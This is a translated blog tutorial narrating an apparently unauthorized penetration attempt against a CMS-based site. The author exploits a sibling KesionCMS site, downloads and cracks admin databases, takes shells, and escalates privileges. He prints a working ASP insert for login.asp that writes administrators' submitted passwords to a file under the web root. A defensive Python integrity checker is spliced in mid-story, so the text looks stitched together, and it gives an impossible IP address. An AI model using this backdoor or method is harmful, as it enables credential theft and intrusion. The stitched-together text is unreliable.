Only one login page website Penetration Process

Author: Xiao Dan
Target station http://admin.123456.com/123456, used here for demonstration. One look at that bare management page and my head spins. How am I supposed to get into this...
 
Well, I scanned it first: only port 80 is open, and the other ports are irrelevant. OK, no choice, on to the C segment.
 
So I went over the C segment, and the only thing in it was a domain name similar to the target, http://wrtye.123456.com/, plus a flash page. Nothing there; the rest of the C segment is all far from the target IP, and the domain name is miles away from it too. I already knew his subnet held only a few machines, so I would have been an idiot to keep hammering the C segment. No good.
We can see that this is a sub-domain, so let's see if it gives any clue. Looking at the main site, its IP is far from the target's and not in the same CIDR block. But it may be on the same intranet. No way around it: I have to start from the main site.
 
Starting with http://www.123456.com/. Hard to tell much from it; there is a search box...
 
The program is easy enough to recognize: it is Ke Xun (KesionCMS). So I searched online; the various EXPs I tried gave no results, and I couldn't bypass it. Later I found another Ke Xun station running a lower version, got in directly, downloaded the database, cracked the password and got a SHELL. Just like that...
After getting that shell, I jumped from it straight into the main site's directory and took that too. I won't go into detail; the purpose wasn't the SHELL itself but downloading the database as material for social engineering.
There are three administrators. The first admin's hash could not be cracked. The second password is 000000. The third password is 123456 .. I tried social engineering the first one first. No luck. I searched online for a way to intercept Ke Xun's backend password and it seems there is nothing, so I had to write it myself. Found his login file: login.asp
 
<% End Sub
Sub CheckLogin()
    Dim PWD, UserName, LoginRS, SqlStr, RndPassword
    Dim ScriptName, AdminLoginCode
    AdminLoginCode = KS.G("AdminLoginCode")
    If Trim(Request.Form("Verifycode")) <> Trim(Session("Verifycode")) Then
        Call KS.Alert("Logon Failed: \n verification code is incorrect. Please enter it again!", "Login.asp")
        Exit Sub
    End If
    If EnableSiteManageCode = True And AdminLoginCode <> SiteManageCode Then
        Call KS.Alert("Logon Failed: \n the backend management authentication code you entered is incorrect. Please enter it again!", "Login.asp")
        Exit Sub
    End If
    ' -----------------------------------
    ' Added code: when the submitted account is admin, write the submitted
    ' password to a text file under the web root before normal checking runs
    Dim aaa, bbb
    bbb = Request.Form("username")
    aaa = Request.Form("pwd")
    If "admin" = bbb Then
        Dim Content, Fso, Fout
        Set Fso = Server.CreateObject("Scripting.FileSystemObject")
        Set Fout = Fso.CreateTextFile(Server.Mappath("../435.txt"))
        Fout.WriteLine "mm = '" & aaa & "'"
        Fout.Write Content
        Fout.Close
        Set Fout = Nothing
        Set Fso = Nothing
    End If
    ' -------------------------------
    Pwd = MD5(KS.R(Request.Form("pwd")), 16)

    UserName = KS.R(Trim(Request.Form("username")))
    RndPassword = KS.R(KS.MakeRandomChar(20))
    ScriptName = KS.R(Trim(Request.ServerVariables("HTTP_REFERER")))
 
I tested it for a long time. Looking at the code, If "admin" = bbb Then means only logins with the account admin are recorded, and the code that follows overwrites the previously recorded password, that is, only the last login password is kept. If some idiot hacker happens to be trying passwords at that moment it won't be captured;
of course that is possible, but the chance is very small. As luck would have it, the administrator logged on soon after ..
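As an added, defender-side example (not from the original post and not KesionCMS code): a Python file-integrity check that baselines a web root, reports changed or new files, and flags ASP pages that both read form credentials and open files for writing, which is the pattern of the insert above. The web root, the tampered login.asp and the drop file name are constructed fixtures.

```python
import hashlib, os, re, tempfile

# Constructed fixture, not the site's real code: a minimal clean handler and the
# same file with a credential-logging insert modelled on the block above.
CLEAN_LOGIN = '<%\nSub CheckLogin()\n  Pwd = MD5(KS.R(Request.Form("pwd")), 16)\nEnd Sub\n%>\n'
TAMPER = ('  Set Fso = Server.CreateObject("Scripting.FileSystemObject")\n'
          '  Set Fout = Fso.CreateTextFile(Server.Mappath("../drop.txt"))\n'
          '  Fout.WriteLine "mm=\'" & Request.Form("pwd") & "\'"\n')
TAMPERED_LOGIN = CLEAN_LOGIN.replace('  Pwd = MD5', TAMPER + '  Pwd = MD5')

# Heuristic: an authentication page has no business writing files while it reads form credentials.
FILE_WRITE = re.compile(r'FileSystemObject|CreateTextFile|OpenTextFile', re.I)
FORM_CRED = re.compile(r'Request\.Form\s*\(\s*"(pwd|password|username)"', re.I)

def put(path, text):
    with open(path, 'w') as f:
        f.write(text)

def baseline(root):
    """Map forward-slash relative path -> sha256 for every file under root."""
    out = {}
    for d, _, files in os.walk(root):
        for name in files:
            p = os.path.join(d, name)
            with open(p, 'rb') as f:
                out[os.path.relpath(p, root).replace(os.sep, '/')] = hashlib.sha256(f.read()).hexdigest()
    return out

def audit(root, base):
    """Return (changed, suspicious): new or modified files, and ASP files that read form credentials and write to disk."""
    current = baseline(root)
    changed = sorted(p for p, h in current.items() if base.get(p) != h)
    suspicious = []
    for rel in current:
        if rel.lower().endswith(('.asp', '.aspx')):
            with open(os.path.join(root, rel), errors='replace') as f:
                src = f.read()
            if FILE_WRITE.search(src) and FORM_CRED.search(src):
                suspicious.append(rel)
    return changed, sorted(suspicious)

def demo():
    root = tempfile.mkdtemp()  # throwaway web root for the constructed fixture
    os.makedirs(os.path.join(root, 'admin'))
    login = os.path.join(root, 'admin', 'login.asp')
    put(login, CLEAN_LOGIN)
    base = baseline(root)  # taken while the site is known-good
    put(login, TAMPERED_LOGIN)
    put(os.path.join(root, 'drop.txt'), "mm = 'x'\n")  # the file such an insert would write captured passwords into
    return audit(root, base)
```

In practice the baseline is stored off the web server and the audit runs on a schedule; both the modified login.asp and the new drop file show up as changes, and login.asp is also flagged by the content heuristic.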
 
Okay, the password is intercepted, so next I went to the target station to log on at http://admin.123456.com/ ... damn... still failed.
It seems the penetration will have to continue. So I ran ipconfig and had a look.
...: Home
...: Fe80: 9c3a: 340b: 748b: d
...: 192.168.46.124
...: 255.255.255.0
...: 192.168.46.290
Very good, it is on an intranet. So I escalated privileges with pr, which took it in seconds, then cracked the HASH .. more material for social engineering, and continued. I scanned the intranet segment and found only one live host, 192.168.46.126. Accessing 192.168.46.126:80 shows an error. If that live host were our target site it would be accessible; so there is no point continuing intranet penetration, because the target station is not on the same intranet. There is no domain either, so no domain penetration. So,
I went back to the target station with the information collected so far and tried social engineering, still with no result. Is this just a matter of luck?
This is the end of the tutorial. Although the target station was not taken, it offers plenty of ideas and techniques.
This article is from: Xiaogan's Blog
